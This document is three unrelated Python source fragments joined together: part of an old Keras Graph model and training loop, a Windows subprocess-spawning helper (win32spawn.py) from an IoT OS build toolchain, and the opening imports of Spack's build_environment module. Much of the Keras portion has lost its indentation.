        data_gen_queue, _data_stop = generator_queue(generator, max_q_size=max_data_q_size,
                                                     wait_time=wait_time, nb_worker=nb_worker)
        if do_validation and not val_gen:
            # static validation data: validate and standardize it once up front
            X_val, y_val, sample_weight_val = self._check_generator_output(validation_data,
                                                                           _data_stop)
            self.validation_data = X_val + [y_val, sample_weight_val]
        else:
            self.validation_data = None
        self.stop_training = False
        while epoch < nb_epoch:
            callbacks.on_epoch_begin(epoch)
            samples_seen = 0
            batch_index = 0
            while samples_seen < samples_per_epoch:
                generator_output = None
                # poll the queue until a batch arrives, or a worker
                # signals an error via _data_stop
                while not _data_stop.is_set():
                    if not data_gen_queue.empty():
                        generator_output = data_gen_queue.get()
                        break
                    else:
                        time.sleep(wait_time)
                X, y, sample_weight = self._check_generator_output(generator_output,
                                                                   _data_stop)
                batch_logs = {}
                batch_size = len(X[0])
                batch_logs['batch'] = batch_index
                batch_logs['size'] = batch_size
                callbacks.on_batch_begin(batch_index, batch_logs)
                outs = self.train_on_batch(X, y,
                                           accuracy=show_accuracy,
                                           sample_weight=sample_weight,
                                           class_weight=class_weight)
                if type(outs) != list:
                    outs = [outs]
                for l, o in zip(out_labels, outs):
                    batch_logs[l] = o
                callbacks.on_batch_end(batch_index, batch_logs)
                # construct epoch logs
                epoch_logs = {}
                batch_index += 1
                samples_seen += batch_size
                # epoch finished: run validation before leaving the inner loop
                if samples_seen >= samples_per_epoch and do_validation:
                    if val_gen:
                        val_outs = self.evaluate_generator(validation_data,
                                                           nb_val_samples,
                                                           show_accuracy=show_accuracy,
                                                           verbose=0, nb_worker=nb_val_worker,
                                                           wait_time=wait_time)
                    else:
                        val_outs = self.evaluate(X_val, y_val,
                                                 show_accuracy=show_accuracy,
                                                 sample_weight=sample_weight_val,
                                                 verbose=0)
                    if type(val_outs) != list:
                        val_outs = [val_outs]
                    # same labels assumed
                    for l, o in zip(out_labels, val_outs):
                        epoch_logs['val_' + l] = o
            callbacks.on_epoch_end(epoch, epoch_logs)
            epoch += 1
            if self.stop_training:
                break
        # signal generator worker(s) to terminate
        _data_stop.set()
        callbacks.on_train_end()
        return self.history
class Graph(Model, containers.Graph):
'''Arbitrary connection graph.
It can have any number of inputs and outputs,
with each output trained with its own loss function.
The quantity being optimized by a Graph model is
the sum of all loss functions over the different outputs.
Inherits from `containers.Graph`.
'''
    def compile(self, optimizer, loss, sample_weight_modes={},
                loss_weights={}, **kwargs):
        '''Configure the learning process.

        # Arguments
            optimizer: str (name of optimizer) or optimizer object.
                See [optimizers](optimizers.md).
            loss: dictionary mapping the name(s) of the output(s) to
                a loss function (string name of objective function or
                objective function. See [objectives](objectives.md)).
            sample_weight_modes: optional dictionary mapping certain
                output names to a sample weight mode ("temporal" and None
                are the only supported modes). If you need to do
                timestep-wise loss weighting on one of your graph outputs,
                you will need to set the sample weight mode for this output
                to "temporal".
            loss_weights: dictionary you can pass to specify a weight
                coefficient for each loss function (in a multi-output model).
                If no loss weight is specified for an output,
                the weight for this output's loss will be considered to be 1.
            kwargs: for Theano backend, these are passed into K.function.
                Ignored for Tensorflow backend.
        '''
        assert type(loss) is dict, 'The "loss" argument should be a dictionary.'
        assert type(sample_weight_modes) is dict, 'The "sample_weight_modes" argument should be a dictionary.'
        self.sample_weight_modes = sample_weight_modes
        self.loss_weights = loss_weights
        ys = []  # target placeholders, one per output
        ys_train = []  # symbolic outputs in train mode
        ys_test = []  # symbolic outputs in test mode
        weights = []  # sample-weight placeholders, one per output
        train_loss = 0.
        test_loss = 0.
        # build one placeholder + weighted loss term per named output;
        # the total loss is the (loss_weights-scaled) sum over outputs
        for output_name in self.output_order:
            loss_fn = loss[output_name]
            output = self.outputs[output_name]
            y_train = output.get_output(True)
            y_test = output.get_output(False)
            y = K.placeholder(ndim=K.ndim(y_train))
            ys.append(y)
            ys_train.append(y_train)
            ys_test.append(y_test)
            if hasattr(output, "get_output_mask"):
                mask = output.get_output_mask()
            else:
                mask = None
            # "temporal" weighting needs a 2D (sample, timestep) weight tensor
            if sample_weight_modes.get(output_name) == 'temporal':
                weight = K.placeholder(ndim=2)
            else:
                weight = K.placeholder(ndim=1)
            weights.append(weight)
            weighted_loss = weighted_objective(objectives.get(loss_fn))
            train_loss += loss_weights.get(output_name, 1.) * weighted_loss(y, y_train, weight, mask)
            test_loss += loss_weights.get(output_name, 1.) * weighted_loss(y, y_test, weight, mask)
        # deal with accuracy computation (only defined for single-output graphs)
        if len(self.output_order) == 1:
            y = ys[0]
            y_train = ys_train[0]
            y_test = ys_test[0]
            # set class_mode, for accuracy computation:
            if self.outputs[self.output_order[0]].output_shape[-1] == 1:
                class_mode = 'binary'
            else:
                class_mode = 'categorical'
            self.class_mode = class_mode
            if class_mode == 'categorical':
                train_accuracy = K.mean(K.equal(K.argmax(y, axis=-1),
                                                K.argmax(y_train, axis=-1)))
                test_accuracy = K.mean(K.equal(K.argmax(y, axis=-1),
                                               K.argmax(y_test, axis=-1)))
            elif class_mode == 'binary':
                # warn the user when categorical_crossentropy is paired with
                # a 1-dimensional (binary) output — almost certainly a mistake
                is_categorical_xent = False
                loss_type = loss[self.output_order[0]]
                if loss_type == 'categorical_crossentropy':
                    is_categorical_xent = True
                if hasattr(loss_type, '__name__') and loss_type.__name__ == 'categorical_crossentropy':
                    is_categorical_xent = True
                if is_categorical_xent:
                    warnings.warn('Your model output has shape ' + str(self.output_shape) +
                                  ' (1-dimensional features), but you are using ' +
                                  ' the `categorical_crossentropy` loss. You ' +
                                  'almost certainly want to use `binary_crossentropy` instead.')
                train_accuracy = K.mean(K.equal(y, K.round(y_train)))
                test_accuracy = K.mean(K.equal(y, K.round(y_test)))
        else:
            # multi-output: accuracy is ill-defined
            self.class_mode = None
        ins = [self.inputs[name].input for name in self.input_order]
        train_ins = ins + ys + weights
        test_ins = ins + ys + weights
        # apply regularizer penalties to the training loss only
        for r in self.regularizers:
            train_loss = r(train_loss)
        self.optimizer = optimizers.get(optimizer)
        updates = self.optimizer.get_updates(self.trainable_weights,
                                             self.constraints,
                                             train_loss)
        updates += self.updates
        self.loss = loss
        # compile backend functions; test/predict use state_updates only
        # (no optimizer updates)
        self._train = K.function(train_ins, [train_loss],
                                 updates=updates, **kwargs)
        if self.class_mode:
            self._train_with_acc = K.function(train_ins, [train_loss, train_accuracy],
                                              updates=updates, **kwargs)
        self._test = K.function(test_ins, [test_loss],
                                updates=self.state_updates, **kwargs)
        if self.class_mode:
            self._test_with_acc = K.function(test_ins, [test_loss, test_accuracy],
                                             updates=self.state_updates, **kwargs)
        self._predict = K.function(inputs=ins, outputs=ys_test,
                                   updates=self.state_updates, **kwargs)
    def fit(self, data, batch_size=128, nb_epoch=100, verbose=1, callbacks=[],
            validation_split=0., validation_data=None, shuffle=True,
            show_accuracy=False,
            class_weight={}, sample_weight={}):
        '''Train the model for a fixed number of epochs.

        Returns a history object. Its `history` attribute is a record of
        training loss values at successive epochs,
        as well as validation loss values (if applicable).

        # Arguments
            data: dictionary mapping input names and outputs names to
                appropriate numpy arrays. All arrays should contain
                the same number of samples.
            batch_size: int. Number of samples per gradient update.
            nb_epoch: int.
            verbose: 0 for no logging to stdout,
                1 for progress bar logging, 2 for one log line per epoch.
            callbacks: `keras.callbacks.Callback` list. List of callbacks
                to apply during training. See [callbacks](callbacks.md).
            validation_split: float (0. < x < 1). Fraction of the data to
                use as held-out validation data.
            validation_data: dictionary mapping input names and outputs names
                to appropriate numpy arrays to be used as
                held-out validation data.
                All arrays should contain the same number of samples.
                Will override validation_split.
            shuffle: boolean. Whether to shuffle the samples at each epoch.
            show_accuracy: whether to log accuracy.
                Can only be used if your Graph has a single output (otherwise "accuracy"
                is ill-defined).
            class_weight: dictionary mapping output names to
                class weight dictionaries.
            sample_weight: dictionary mapping output names to
                numpy arrays of sample weights.
        '''
        if show_accuracy:
            if len(self.output_order) != 1:
                raise Exception('In a Graph model, "show_accuracy" can only '
                                'be used if your Graph has exactly one output.'
                                ' Otherwise accuracy is ill-defined.')
        X = [data[name] for name in self.input_order]
        y = [standardize_y(data[name]) for name in self.output_order]
        if len(set([len(a) for a in X] + [len(a) for a in y])) != 1:
            raise Exception('All input arrays and target arrays must have '
                            'the same number of samples.')
        # per-output standardized sample weights, in output_order
        sample_weight_list = [standardize_weights(y[i],
                                                  sample_weight=sample_weight.get(self.output_order[i]),
                                                  sample_weight_mode=self.sample_weight_modes.get(self.output_order[i])) for i in range(len(self.output_order))]
        class_weight_list = [class_weight.get(name) for name in self.output_order]
        val_f = None
        val_ins = None
        if validation_data or validation_split:
            val_f = self._test
        if validation_data:
            # can't use sample weights with validation data at this point
            y_val = [standardize_y(validation_data[name]) for name in self.output_order]
            # NOTE(review): this rebinds the `sample_weight` dict argument to a
            # list of default (uniform) weights; safe only because the dict was
            # already consumed into sample_weight_list above — confirm if editing
            sample_weight = [standardize_weights(y_val[i]) for i in range(len(y_val))]
            val_ins = [validation_data[name] for name in self.input_order] + [standardize_y(validation_data[name]) for name in self.output_order] + sample_weight
        elif 0 < validation_split < 1:
            # hold out the tail `validation_split` fraction of the data
            split_at = int(len(X[0]) * (1 - validation_split))
            X, X_val = (slice_X(X, 0, split_at), slice_X(X, split_at))
            y, y_val = (slice_X(y, 0, split_at), slice_X(y, split_at))
            sample_weight_list, sample_weight_list_val = (slice_X(sample_weight_list, 0, split_at), slice_X(sample_weight_list, split_at))
            val_ins = X_val + y_val + sample_weight_list_val
        if self.class_mode and show_accuracy:
            f = self._train_with_acc
            out_labels = ['loss', 'acc']
            metrics = ['loss', 'acc', 'val_loss', 'val_acc']
        else:
            f = self._train
            out_labels = ['loss']
            metrics = ['loss', 'val_loss']
        # re-standardize training weights, now folding in class weights
        sample_weight_list = [standardize_weights(y[i],
                                                  sample_weight=sample_weight_list[i],
                                                  class_weight=class_weight_list[i],
                                                  sample_weight_mode=self.sample_weight_modes.get(self.output_order[i])) for i in range(len(self.output_order))]
        ins = X + y + sample_weight_list
        history = self._fit(f, ins, out_labels=out_labels,
                            batch_size=batch_size, nb_epoch=nb_epoch,
                            verbose=verbose, callbacks=callbacks,
                            val_f=val_f, val_ins=val_ins,
                            shuffle=shuffle, metrics=metrics)
        return history
def evaluate(self, data, batch_size=128, show_accuracy=False,
verbose=0, sample_weight={}):
'''Compute the loss on some input data, batch by batch.
Returns the loss over the data,
or a tuple `(loss, accuracy)` if `show_accuracy=True`.
Arguments: see `fit` method.
'''
sample_weight = [standardize_weights(data[name],
sample_weight=sample_weight.get(name),
sample_weight_mode=self.sample_weight_modes.get(name)) for name in self.output_order]
ins = [data[name] for name in self.input_order] + [standardize_y(data[name]) for name in self.output_order] + sample_weight
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
if show_accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "show_accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
fn = self._test_with_acc
else:
fn = self._test
outs = self._test_loop(fn, ins, batch_size, verbose)
if show_accuracy:
return outs
else:
return outs[0]
def predict(self, data, batch_size=128, verbose=0):
'''Generate output predictions for the input samples
batch by batch.
Arguments: see `fit` method.
'''
ins = [data[name] for name in self.input_order]
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
outs = self._predict_loop(self._predict, ins, batch_size, verbose)
return dict(zip(self.output_order, outs))
def train_on_batch(self, data, accuracy=False,
class_weight={}, sample_weight={}):
'''Single gradient update on a batch of samples.
Returns the loss over the data,
or a tuple `(loss, accuracy)` if `accuracy=True`.
Arguments: see `fit` method.
'''
sample_weight = [standardize_weights(data[name],
sample_weight=sample_weight.get(name),
class_weight=class_weight.get(name),
sample_weight_mode=self.sample_weight_modes.get(name)) for name in self.output_order]
ins = [data[name] for name in self.input_order] + [standardize_y(data[name]) for name in self.output_order] + sample_weight
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
if accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
return self._train_with_acc(ins)
return self._train(ins)
def test_on_batch(self, data, accuracy=False, sample_weight={}):
'''Test the network on a single batch of samples.
If `accuracy`, it returns a tuple `(loss, accuracy)`,
otherwise it returns the loss value.
Arguments: see `fit` method.
'''
sample_weight = [standardize_weights(data[name],
sample_weight=sample_weight.get(name),
sample_weight_mode=self.sample_weight_modes.get(name)) for name in self.output_order]
ins = [data[name] for name in self.input_order] + [standardize_y(data[name]) for name in self.output_order] + sample_weight
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
if accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
return self._test_with_acc(ins)
return self._test(ins)
def predict_on_batch(self, data):
'''Generate predictions for a single batch of samples.
'''
ins = [data[name] for name in self.input_order]
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
outs = self._predict(ins)
return dict(zip(self.output_order, outs))
def save_weights(self, filepath, overwrite=False):
'''Save weights from all layers to a HDF5 files.
'''
import h5py
import os.path
# if file exists and should not be overwritten
if not overwrite and os.path.isfile(filepath):
import sys
get_input = input
if sys.version_info[:2] <= (2, 7):
get_input = raw_input
overwrite = get_input('[WARNING] %s already exists - overwrite? '
'[y/n]' % (filepath))
while overwrite not in ['y', 'n']:
overwrite = get_input('Enter "y" (overwrite) or "n" (cancel).')
if overwrite == 'n':
return
print('[TIP] Next time specify overwrite=True in save_weights!')
f = h5py.File(filepath, 'w')
g = f.create_group('graph')
weights = self.get_weights()
g.attrs['nb_params'] = len(weights)
for n, param in enumerate(weights):
param_name = 'param_{}'.format(n)
param_dset = g.create_dataset(param_name, param.shape,
dtype=param.dtype)
param_dset[:] = param
f.flush()
f.close()
def load_weights(self, filepath):
'''Load weights from a HDF5 file.
'''
import h5py
f = h5py.File(filepath, mode='r')
g = f['graph']
weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]
self.set_weights(weights)
f.close()
    def evaluate_generator(self, generator, nb_val_samples, show_accuracy=False,
                           verbose=1, **kwargs):
        '''Evaluates the model on a generator. The generator should
        return the same kind of data with every yield as accepted
        by `evaluate`.

        If `show_accuracy`, it returns a tuple `(loss, accuracy)`,
        otherwise it returns the loss value.

        Arguments:
            generator:
                generator yielding dictionaries of the kind accepted
                by `evaluate`, or tuples of such dictionaries and
                associated dictionaries of sample weights.
            nb_val_samples:
                total number of samples to generate from `generator`
                to use in validation.
            show_accuracy: whether to log accuracy.
                Can only be used if your Graph has a single output (otherwise "accuracy"
                is ill-defined).

        Other arguments are the same as for `fit`.
        '''
        if show_accuracy:
            if len(self.output_order) != 1:
                raise Exception('In a Graph model, "show_accuracy" can only '
                                'be used if your Graph has exactly one output.'
                                ' Otherwise accuracy is ill-defined.')
        done_samples = 0
        all_outs = None  # lazily initialized once the output structure is known
        weights = []  # per-batch sample counts, for the weighted average below
        # run the generator in background thread(s); batches land in a queue
        q, _stop = generator_queue(generator, **kwargs)
        while done_samples < nb_val_samples:
            data, sample_weight = self._check_generator_output(q.get(), _stop)
            # batch size is taken from an arbitrary array in the data dict
            do_samples = len(data[next(iter(data.keys()))])
            outs = self.evaluate(data, batch_size=do_samples,
                                 sample_weight=sample_weight,
                                 show_accuracy=show_accuracy,
                                 verbose=verbose)
            if show_accuracy:
                # outs is a list of outputs: accumulate each one separately
                if all_outs is None:
                    all_outs = [[] for _ in outs]
                for ox, out in enumerate(outs):
                    all_outs[ox].append(out)
            else:
                # outs is a single loss value
                if all_outs is None:
                    all_outs = []
                all_outs.append(outs)
            done_samples += do_samples
            weights.append(do_samples)
        # tell the generator thread(s) to terminate
        _stop.set()
        # average per-batch results, weighting by batch size
        if show_accuracy:
            return [np.average(outx, weights=weights)
                    for outx in all_outs]
        else:
            return np.average(np.asarray(all_outs),
                              weights=weights)
def _check_generator_output(self, generator_output, stop):
'''Verifies the output of a generator to make sure
it is consistent with requirements. Also standardizes
the output.
'''
if type(generator_output) in [list, tuple]:
if len(generator_output) == 2:
data, sample_weight = generator_output
else:
stop.set()
raise Exception('The generator output tuple must have '
'2 dictionary elements: '
'(data, sample_weight).')
elif type(generator_output) == dict:
data = generator_output
sample_weight = {}
else:
stop.set()
raise Exception('The generator output must be '
'a data dictionary or a tuple '
'(data, sample_weight).')
assert type(data) == dict
assert type(sample_weight) == dict
if len(set([len(data[name]) for name in data.keys()] +
[len(sample_weight[name]) for name in sample_weight.keys()])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
sample_weight = {name: standardize_weights(data[name],
sample_weight=sample_weight.get(name),
sample_weight_mode=self.sample_weight_modes.get(name)) for name in self.output_order}
return data, sample_weight
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, show_accuracy=False, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={},
nb_worker=1, nb_val_worker=None):
'''Fit a model on data generated batch-by-batch by a Python generator.
The generator is run in parallel to the model, for efficiency,
and can be run by multiple workers at the same time.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either a dictionary
mapping inputs and outputs names to numpy arrays, or
a tuple of dictionaries (input_data, sample_weight).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
show_accuracy: whether to log accuracy.
Can only be used if your Graph has a single output (otherwise "accuracy"
is ill-defined).
callbacks: list of callbacks to be called during training.
validation_data: dictionary mapping input names and outputs names
to appropriate numpy arrays to be used as
held-out validation data, or a generator yielding such
dictionaries. All arrays should contain the same number
of samples. If a generator, will be called until more than
`nb_val_samples` examples have been generated at the
end of every epoch. These examples will then be used
as the validation data.
nb_val_samples: number of samples to use from validation
generator at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
nb_worker: integer, number of workers to use for running
the generator (in parallel to model training).
If using multiple workers, the processing order of batches
generated by the model will be non-deterministic.
If using multiple workers, make sure to protect
any thread-unsafe operation done by the generator
using a Python mutex.
nb_val_worker: same as `nb_worker`, except for validation data.
Has no effect if no validation data or validation data is
not a generator. If `None`, defaults to nb_worker.
# Returns
A `History` object.
# Examples
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield {'input_1': x1, 'input_2': x2, 'output': y}
f.close()
graph.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
max_data_q_size = 10 # maximum number of batches in queue
wait_time = 0.05 # in seconds
epoch = 0
do_validation = bool(validation_data)
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
if nb_val_worker is None:
nb_val_worker = nb_worker
if show_accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "show_accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
out_labels = ['loss', 'acc']
metrics = ['loss', 'acc', 'val_loss', 'val_acc']
else:
out_labels = ['loss']
metrics = ['loss', 'val_loss']
if not class_weight:
class_weight = {}
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
callbacks._set_model(self)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': metrics,
})
callbacks.on_train_begin()
# start generator thread storing batches into a queue
data_gen_queue, _data_stop = generator_queue(generator, max_q_size=max_data_q_size,
wait_time=wait_time, nb_worker=nb_worker)
if do_validation and not val_gen:
# TODO: _data_stop not really sensical here
data_val, sample_weight_val = self._check_generator_output(validation_data, _data_stop)
sample_weight_val_l = [sample_weight_val[name] for name in self.output_order]
y_val = [standardize_y(data_val[name]) for name in self.output_order]
self.validation_data = [data_val[name] for name in self.input_order] + y_val + sample_weight_val_l
else:
self.validation_data = None
self.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
while not _data_stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
data, sample_weight = self._check_generator_output(generator_output,
_data_stop)
batch_logs = {}
batch_size = len(data[list(data.keys())[0]])
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(data,
sample_weight=sample_weight,
class_weight=class_weight,
accuracy=show_accuracy)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
verbose=0,
show_accuracy=show_accuracy,
nb_worker=nb_val_worker,
wait_time=wait_time)
else:
val_outs = self.evaluate(data_val,
sample_weight=sample_weight_val,
show_accuracy=show_accuracy,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if self.stop_training:
break
_data_stop.set()
callbacks.on_train_end()
return self.history
|
win32spawn.py | #
# File : win32spawn.py
# This file is part of CMCC IOT OS
# COPYRIGHT (C) 2012-2020, CMCC IOT
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#
import os
import threading
import Queue
# Windows import
import win32file
import win32pipe
import win32api
import win32con
import win32security
import win32process
import win32event
class Win32Spawn(object):
    """Run a command through cmd.exe on Windows, streaming the child's
    stdout and stderr into an internal queue via reader threads.

    The child's standard handles are attached to anonymous pipes.  Our
    ends of those pipes are duplicated as non-inheritable handles and
    the inheritable originals are closed, so the child cannot keep our
    ends open after it exits.
    """

    def __init__(self, cmd, shell=False):
        self.queue = Queue.Queue()
        self.is_terminated = False
        # Auto-reset event, initially unsignalled; kill_subprocess()
        # signals it to interrupt wait()/sleep().
        self.wake_up_event = win32event.CreateEvent(None, 0, 0, None)

        exec_dir = os.getcwd()
        comspec = os.environ.get("COMSPEC", "cmd.exe")
        cmd = comspec + ' /c ' + cmd

        win32event.ResetEvent(self.wake_up_event)

        currproc = win32api.GetCurrentProcess()

        # Pipe ends created with these attributes are inheritable by the
        # child; we duplicate our ends as non-inheritable and close the
        # inheritable originals.
        sa = win32security.SECURITY_ATTRIBUTES()
        sa.bInheritHandle = 1

        child_stdout_rd, child_stdout_wr = win32pipe.CreatePipe(sa, 0)
        child_stdout_rd_dup = win32api.DuplicateHandle(
            currproc, child_stdout_rd, currproc, 0, 0,
            win32con.DUPLICATE_SAME_ACCESS)
        win32file.CloseHandle(child_stdout_rd)

        child_stderr_rd, child_stderr_wr = win32pipe.CreatePipe(sa, 0)
        child_stderr_rd_dup = win32api.DuplicateHandle(
            currproc, child_stderr_rd, currproc, 0, 0,
            win32con.DUPLICATE_SAME_ACCESS)
        win32file.CloseHandle(child_stderr_rd)

        child_stdin_rd, child_stdin_wr = win32pipe.CreatePipe(sa, 0)
        child_stdin_wr_dup = win32api.DuplicateHandle(
            currproc, child_stdin_wr, currproc, 0, 0,
            win32con.DUPLICATE_SAME_ACCESS)
        win32file.CloseHandle(child_stdin_wr)

        startup_info = win32process.STARTUPINFO()
        startup_info.hStdInput = child_stdin_rd
        startup_info.hStdOutput = child_stdout_wr
        startup_info.hStdError = child_stderr_wr
        startup_info.dwFlags = win32process.STARTF_USESTDHANDLES

        # Run the child in its own process group so it can be terminated
        # independently of this process.
        cr_flags = win32process.CREATE_NEW_PROCESS_GROUP

        env = os.environ.copy()
        self.h_process, h_thread, dw_pid, dw_tid = win32process.CreateProcess(
            None, cmd, None, None, 1,
            cr_flags, env, os.path.abspath(exec_dir),
            startup_info)
        win32api.CloseHandle(h_thread)

        # Close the child-side pipe ends held by this process; the child
        # now owns its inherited copies.
        win32file.CloseHandle(child_stdin_rd)
        win32file.CloseHandle(child_stdout_wr)
        win32file.CloseHandle(child_stderr_wr)

        self.__child_stdout = child_stdout_rd_dup
        self.__child_stderr = child_stderr_rd_dup
        self.__child_stdin = child_stdin_wr_dup

        self.exit_code = -1

    def close(self):
        """Release every handle owned by this object."""
        win32file.CloseHandle(self.__child_stdout)
        win32file.CloseHandle(self.__child_stderr)
        win32file.CloseHandle(self.__child_stdin)
        win32api.CloseHandle(self.h_process)
        win32api.CloseHandle(self.wake_up_event)

    def kill_subprocess(self):
        # Fix: this method was declared without ``self`` but references
        # self.wake_up_event; calling it as a bound method raised
        # TypeError before the fix.
        """Ask the waiting thread to terminate the child process."""
        win32event.SetEvent(self.wake_up_event)

    def sleep(self, secs):
        # Fix: also declared without ``self`` originally (same defect as
        # kill_subprocess).
        """Sleep up to ``secs`` seconds, waking early if interrupted.

        Returns True on a full timeout, False if wake_up_event fired.
        """
        win32event.ResetEvent(self.wake_up_event)
        timeout = int(1000 * secs)
        val = win32event.WaitForSingleObject(self.wake_up_event, timeout)
        if val == win32event.WAIT_TIMEOUT:
            return True
        else:
            # The wake_up_event must have been signalled
            return False

    def get(self, block=True, timeout=None):
        """Pop the next chunk of child output from the queue."""
        return self.queue.get(block=block, timeout=timeout)

    def qsize(self):
        """Number of output chunks currently queued."""
        return self.queue.qsize()

    def __wait_for_child(self):
        """Block until the child exits or kill_subprocess() fires.

        Returns True on natural exit, False if the child was killed.
        """
        # kick off threads to read from stdout and stderr of the child process
        threading.Thread(target=self.__do_read,
                         args=(self.__child_stdout, )).start()
        threading.Thread(target=self.__do_read,
                         args=(self.__child_stderr, )).start()

        while True:
            # block waiting for the process to finish or the interrupt
            # to happen
            handles = (self.wake_up_event, self.h_process)
            val = win32event.WaitForMultipleObjects(handles, 0,
                                                    win32event.INFINITE)
            if (val >= win32event.WAIT_OBJECT_0 and
                    val < win32event.WAIT_OBJECT_0 + len(handles)):
                handle = handles[val - win32event.WAIT_OBJECT_0]
                if handle == self.wake_up_event:
                    win32api.TerminateProcess(self.h_process, 1)
                    win32event.ResetEvent(self.wake_up_event)
                    return False
                elif handle == self.h_process:
                    # the process has ended naturally
                    return True
                else:
                    assert False, "Unknown handle fired"
            else:
                assert False, "Unexpected return from WaitForMultipleObjects"

    # Wait for the job to finish.  Since this method blocks, it should be
    # called from another thread.  If the application wants to kill the
    # process, it should call kill_subprocess().
    def wait(self):
        """Block until the child exits; return True iff it exited with 0."""
        if not self.__wait_for_child():
            # it's been killed
            result = False
        else:
            # normal termination
            self.exit_code = win32process.GetExitCodeProcess(self.h_process)
            result = self.exit_code == 0
        self.close()
        self.is_terminated = True
        return result

    # This method gets called on a worker thread to read from either the
    # stderr or stdout pipe of the child process.
    def __do_read(self, handle):
        bytesToRead = 1024
        while 1:
            try:
                finished = 0
                hr, data = win32file.ReadFile(handle, bytesToRead, None)
                if data:
                    self.queue.put_nowait(data)
            except win32api.error:
                # Pipe closed (child exited) -- stop reading.
                finished = 1
            if finished:
                return

    def start_pipe(self):
        """Run wait() on a worker thread so the caller is not blocked."""
        def worker(pipe):
            return pipe.wait()

        thrd = threading.Thread(target=worker, args=(self, ))
        thrd.start()
|
build_environment.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. This allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.schema.environment
import spack.store
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
